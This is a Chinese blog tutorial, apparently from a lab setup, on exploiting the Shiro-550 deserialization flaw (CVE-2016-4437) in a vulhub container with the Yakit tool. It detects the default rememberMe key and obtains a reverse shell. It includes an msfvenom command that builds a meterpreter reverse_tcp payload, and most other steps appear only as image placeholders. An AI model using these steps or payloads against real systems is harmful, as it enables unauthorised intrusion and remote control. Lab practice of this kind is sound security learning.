yakit shiro-550 返连shell命令执行

前言

今天以vulhub的shiro的案例,介绍一下yakit的反向连接功能。

环境准备

  • ubutnu22
  • docker
  • vulhub https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2016-4437

IP
ubuntu 192.168.56.31
yakit所在主机 192.168.56.1

shiro 探测

MITM 开启 shiro自定义检测
testpng

勾选rememberme,输入随便什么账号密码,抓包
testpng

在yakit菜单栏的“bug”上,能看到已经检测到shiro默认key。
testpng

查看详情
testpng

接下来,让我们通过yakit内置的利用链,反弹shell。

反向连接

代码生成器本文没用到,但我觉得还是介绍一下。它相当于将常见的反弹shell命令集成到一块。真不愧是个综合平台。

代码生成器

生成反向连接的代码
testpng

MSF版本
testpng

结果:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=8085 -f elf -o reverse.elf

开启端口监听

testpng

监听中……
testpng

我们选择下图标记1的Yso-Java-hack,生成利用链,添加反向连接的IP和端口
testpng

代码发送到yak runner模块,因为yakit默认的利用代码就是shiro。所以我们不需要做太多的更改,只要取消注释,添加目标URL参数。
testpng

目标URL,点击右上角的执行
testpng

此时,查看监听器,可以看到有来自192.168.56.32反向连接
testpng

注意:如果你此时无法在终端输入信息,把右上角的原始模式关掉

testpng

此时,就可以直接使用了
testpng

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值